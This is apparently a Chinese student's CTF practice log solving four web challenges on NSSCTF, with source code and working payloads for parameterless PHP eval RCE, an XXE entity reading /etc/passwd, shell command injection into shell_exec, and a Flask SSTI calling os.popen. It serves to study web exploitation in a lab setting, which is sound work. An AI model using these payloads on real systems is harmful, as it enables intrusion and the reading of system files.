NSSCTF web 刷题记录1

文章目录

  • 前言
  • 题目
    • [[GXYCTF 2019]禁止套娃](#[GXYCTF 2019]禁止套娃)
    • [[NCTF 2019]Fake XML cookbook](#[NCTF 2019]Fake XML cookbook)
    • [[NSSRound#7 Team]ec_RCE](#7 Team]ec_RCE)
    • [[NCTF 2018]Flask PLUS](#[NCTF 2018]Flask PLUS)

前言

今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。


题目

[GXYCTF 2019]禁止套娃

打开题目,直接扫一下目录

发现是存在git泄露---参考文章

然后使用专门的工具Githack(下载地址

打开终端,运行python(运行后要访问,/.git/才能有结果)

源代码

复制代码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

分析一下

第一个if语句禁用了一些php伪协议

第二个if语句很明显是无参rce的标志,一般代码为

复制代码
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

第三个if语句是禁用我们要rce的一些函数,比如phpinfo()

所以rce的关键是无参

方法一

使用session_start()+session_id()读取文件(php<7)

payload

复制代码
?exp=show_source(session_id(session_start())); 
Cookie: PHPSESSID=flag.php

得到flag

方法二

php函数直接读取文件

先读取数组,查看flag在第几个

payload

复制代码
?exp=print_r(scandir(current(localeconv())));

发现是第三个,那么我们可以先倒序再读取第二个

复制代码
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

即可得到flag

[NCTF 2019]Fake XML cookbook

打开题目,根据提示应该不是sql注入

随便输入然后bp抓包,发现是xml格式的登录

联想到XML中存在的XXE漏洞

payload

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>1</password></user>

修改下命令,直接得到flag

[NSSRound#7 Team]ec_RCE

源代码

复制代码
 <!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHP
    
    if(!isset($_POST["action"]) && !isset($_POST["data"]))
        show_source(__FILE__);

    putenv('LANG=zh_TW.utf8'); 

    $action = $_POST["action"];
    $data = "'".$_POST["data"]."'";

    $output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");
    echo $output;    
?> 

分析一下,有两个POST参数可控,然后出现shell_exec()函数

它的作用:将字符串作为OS命令执行,需要输出执行结果,且输出全部的内容。

payload

复制代码
action=||&data='cat /flag'
或者
action=;cat /flag&data=

得到flag

[NCTF 2018]Flask PLUS

打开题目,在url输入{``{7*7}}
发现存在ssti漏洞

payload

复制代码
{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}

然后得到flag

相关推荐
Shartin4 小时前
Can201-Introduction to Networking: Application Layer应用层
服务器·开发语言·php
乌云暮年5 小时前
Linux常用命令
linux·服务器·ssh·php
学习溢出6 小时前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
鹿鸣天涯7 小时前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全
apihz7 小时前
通用图片搜索-搜狗源免费API接口使用指南
android·java·python·php·音视频
博睿谷IT99_7 小时前
华为数据通信网络基础
开发语言·华为·php·华为认证
Bruce_Liuxiaowei15 小时前
dict协议在网络安全中的应用与风险分析
网络·安全·web安全·伪协议
FreeBuf_15 小时前
蓝牙协议栈高危漏洞曝光,攻击可入侵奔驰、大众和斯柯达车载娱乐系统
安全·web安全·娱乐
阿俊-全栈开发20 小时前
crmeb多门店对接拉卡拉支付小程序聚合收银台集成全流程详解
小程序·php·拉卡拉聚合收银台·拉卡拉三方支付
浩浩测试一下1 天前
Windows 与 Linux 内核安全及 Metasploit/LinEnum 在渗透测试中的综合应用
linux·运维·windows·web安全·网络安全·系统安全·安全架构